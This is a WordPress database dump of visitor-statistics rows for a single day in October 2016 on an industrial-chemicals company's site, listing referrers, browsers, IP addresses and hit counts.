INSERT INTO `wp_statistics_visitor` VALUES (7703, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.149.199.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7704, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '174.112.36.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7705, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.203.178.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7706, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.142.91.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7707, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.50.147.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7708, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.190.106.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7709, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.201.122.226', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7710, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.27.38.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7711, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.143.73.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7712, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.161.150.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7713, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.226.144.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7714, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.248.60.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7715, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7716, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.244.132.178', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7717, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '170.5.119.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7718, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.4.253.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7719, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.117.134.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7720, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7721, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '150.242.72.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7722, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&sqi=2&ved=0ahUKEwiUotyL4-nPAhVLRiYKHUAVD0QQFghRMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-828%2F&usg=AFQjCNG-ULz5hPi_elA0tDheufF5SIOMyg&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '76.247.103.163', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7723, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.143.167.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7724, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7725, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.21.213.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7726, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.19.134.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7727, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7728, '2016-10-20', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwidov2X4-nPAhVKOD4KHRwEDbgQFgguMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct-tag%2Fanti-static%2F&usg=AFQjCNExiygIW8dPpSCNh7E_iEA7gyq6hQ', 'MSIE', 'Windows', '11.0', '', '161.44.255.94', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7729, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.148.47.158', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7730, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.91.221.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7731, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.60.65.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7732, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.114.221', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7733, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.65.8.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7734, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.38.186.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7735, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.227.52.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7736, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.223.132.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7737, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.203.229.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7738, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.117.51.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7739, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.186.51.161', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7740, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.213.216.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7741, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.104.225.177', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7742, '2016-10-20', 'https://www.bing.com/search?q=krytox+eg+2000+specifications&go=Search&qs=bs&form=QBRE', 'MSIE', 'Windows', '11.0', '', '216.173.131.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7743, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.173.127.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7744, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.242.132.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7745, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.115.190.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7746, '2016-10-20', 'https://www.google.com.ph/', 'Chrome', 'Windows', '53.0.2785.143', '', '125.212.54.18', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7747, '2016-10-20', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '121.58.217.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7748, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.145.251.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7749, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.241.31.105', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7750, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.235.115.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7751, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.36.178.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7752, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.156.133.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7753, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.186.65.155', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7754, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.220.74.208', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7755, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.124.51.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7756, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.26.152.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7757, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.247.244.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7758, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.35.29.250', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7759, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.144.117.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7760, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.119.135.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7761, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.241.130.39', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7762, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.109.11.209', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7763, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.31.117.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7764, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.198.228.6', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7765, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.8.172.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7766, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.240.198.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7767, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '97.84.86.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7768, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.107.106.164', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7769, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.231.111.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7770, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.47.72.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7771, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.195.243.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7772, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.121.161.167', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7773, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '193.200.51.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7774, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '10.21.2.155', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7775, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.94.59.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7776, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.25.147.188', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7777, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.185.108.186', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7778, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '198.71.225.136', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7779, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.53.114.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7780, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.6.47.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7781, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.6.153.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7782, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.111.0.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7783, '2016-10-20', 'https://www.bing.com/search?q=Vazo-52&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '155.91.28.231', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7784, '2016-10-20', 'https://www.google.ca/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '184.147.155.69', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7785, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.191.62.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7786, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.138.11.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7787, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.233.125.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7788, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.223.48.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7789, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.86.234.241', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7790, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.35.173.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7791, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.249.9.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7792, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.157.129.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7793, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.19.222.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7794, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.132.64.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7795, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.209.116.38', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7796, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.143.19.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7797, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.117.57.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7798, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.33.232.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7799, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '68.64.174.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7800, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '141.136.186.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7801, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '64.119.222.210', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7802, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.15.163.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7803, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '159.205.113.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7804, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.143.182.27', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7805, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.87.234.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7806, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.193.209.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7807, '2016-10-20', 'https://www.mosrif.ru/', 'MSIE', 'Windows', '6.0', '', '134.249.65.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7808, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.164.231.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7809, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.162.189.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7810, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.98.116.237', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7811, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.48.238.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7812, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '45.0.2454.94', '', '174.200.8.210', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7813, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '168.167.94.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7814, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.6.170.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7815, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.54.137.221', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7816, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.99.240.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7817, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.253.174.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7818, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.101.45.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7819, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.74.237.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7820, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.206.216.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7821, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.252.5.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7822, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.196.176.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7823, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.168.186.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7824, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.57.208.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7825, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.220.78.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7826, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.224.190.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7827, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.109.231.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7828, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.27.199.96', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7829, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.138.56.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7830, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.57.154.182', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7831, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.224.216.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7832, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.137.196.151', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7833, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.55.110.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7834, '2016-10-20', 'https://www.google.com.py/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.211.243.250', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7835, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.16.107.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7836, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '108.79.198.49', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7837, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.100.99.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7838, '2016-10-20', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiq65WE7OnPAhWIX34KHeG7DjcYABAA&sig=AOD64_2t2s4X8Ju0uhd64BMUbepN8jhc-A&rct=j&q=&ved=0ahUKEwicmpOE7OnPAhUQ8GMKHRh9BQ0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '184.191.160.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7839, '2016-10-20', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '130.49.178.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7840, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.92.53.188', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7841, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.166.103.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7842, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.243.57.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7843, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.103.25.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7844, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.253.103.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7845, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiVkID57OnPAhXKdD4KHbV-Bv4QFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '138.26.91.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7846, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.134.112.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7847, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7848, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.135.181.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7849, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.198.102.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7850, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.93.149.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7851, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.158.184.43', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7852, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.178.70.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7853, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwj9tIDq7enPAhUF6iYKHfQRCsgQFgghMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '138.162.0.43', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7854, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.74.124.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7855, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.235.116.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7856, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.64.19.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7857, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.54.104.26', '000', 3, 0); 
